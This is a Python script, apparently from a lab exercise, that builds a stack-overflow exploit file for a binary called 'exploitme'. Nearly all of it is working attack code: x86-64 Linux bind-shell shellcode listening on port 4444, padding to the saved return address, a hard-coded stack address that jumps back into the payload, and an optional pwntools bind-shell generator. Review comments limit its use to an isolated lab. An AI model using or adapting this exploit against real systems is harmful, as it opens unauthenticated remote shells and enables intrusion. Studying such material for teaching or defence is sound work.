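#!/usr/bin/env python3
# shellcode.py
#
# Builds the exploit file for ``exploitme``: a bind-shell payload, padding out
# to the saved-return-address slot, and a hard-coded stack address that sends
# execution back into the injected payload.
#
# NOTE(review): the original header said this "calls goal_func"; the code
# actually returns into the shellcode (see ADDRESS_OF_SHELLCODE), so the
# header was stale.  The shebang is ``python3`` because ``int.to_bytes`` does
# not exist on Python 2.
#
# Payload layout produced by build_exploit():
#     [shellcode][b"A" * (FRAME_SIZE - len(shellcode))][8-byte LE address]

# Step 1: Shellcode -- x86-64 Linux bind shell on TCP/4444.  The port is
# visible in the bytes ``\x11\x5c`` (0x115c == 4444 in network byte order).
# Copied verbatim from https://www.exploit-db.com/shellcodes/46979
# NOTE(review): this is an unauthenticated listener on all interfaces; only
# run the resulting exploit against a target on an isolated lab network.
SHELLCODE = b"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"

# Distance in bytes from the start of the overflowed buffer to the saved
# return address.  Presumably measured from exploitme's frame layout --
# re-verify in a debugger if the target binary is rebuilt.
FRAME_SIZE = 152

# Address written over the saved return address; it must point at the copy of
# SHELLCODE sitting in the target's stack.  A fixed stack address like this
# only holds while ASLR is disabled and the stack layout (environment, argv,
# binary) is identical to the one it was measured in -- re-measure otherwise.
ADDRESS_OF_SHELLCODE = 0x7FFFFFFFDE10

# Step 5 destination.
OUTPUT_PATH = "shellcode.exploit"


def pwntools_bindsh():
    """Return a pwntools-generated amd64 Linux bind shell on port 4444.

    Kept as an alternative to the hard-coded SHELLCODE but not used by
    default: the original author notes it "doesn't work because we don't
    have enough stack space", i.e. the generated payload is larger than the
    room in the overflowed buffer (build_exploit() now rejects that case
    explicitly).  pwntools is imported lazily so it stays an optional
    dependency.

    Returns:
        The assembled shellcode as bytes.
    """
    from pwn import asm, context, shellcraft

    context.update(arch='amd64', os='linux')
    return asm(shellcraft.amd64.linux.bindsh(4444))


def build_exploit(shellcode=SHELLCODE, frame_size=FRAME_SIZE,
                  return_address=ADDRESS_OF_SHELLCODE):
    """Return the payload: shellcode, padding to frame_size, LE address.

    Args:
        shellcode: Machine code placed at the start of the buffer.
        frame_size: Offset of the saved return address from the buffer start;
            the payload is padded with ``b"A"`` up to exactly this length.
        return_address: 64-bit address written, little-endian, over the
            saved return address.

    Returns:
        ``frame_size + 8`` bytes.

    Raises:
        ValueError: if ``shellcode`` is longer than ``frame_size``.  The
            original code silently produced no padding in that case
            (``b"A" * negative == b""``) and the address landed at the wrong
            offset, which is an easy-to-miss failure.
        OverflowError: if ``return_address`` does not fit in 8 bytes.
    """
    if len(shellcode) > frame_size:
        raise ValueError(
            f"shellcode is {len(shellcode)} bytes, larger than the "
            f"{frame_size}-byte frame"
        )
    # Step 2: Pad the exploit out to frame_size bytes
    padding = b"A" * (frame_size - len(shellcode))
    # Steps 3-4: append the target address as a little-endian byte string
    return shellcode + padding + return_address.to_bytes(8, "little")


def main():
    """Step 5: Write the default exploit to OUTPUT_PATH."""
    with open(OUTPUT_PATH, "wb") as f:
        f.write(build_exploit())


if __name__ == "__main__":
    main()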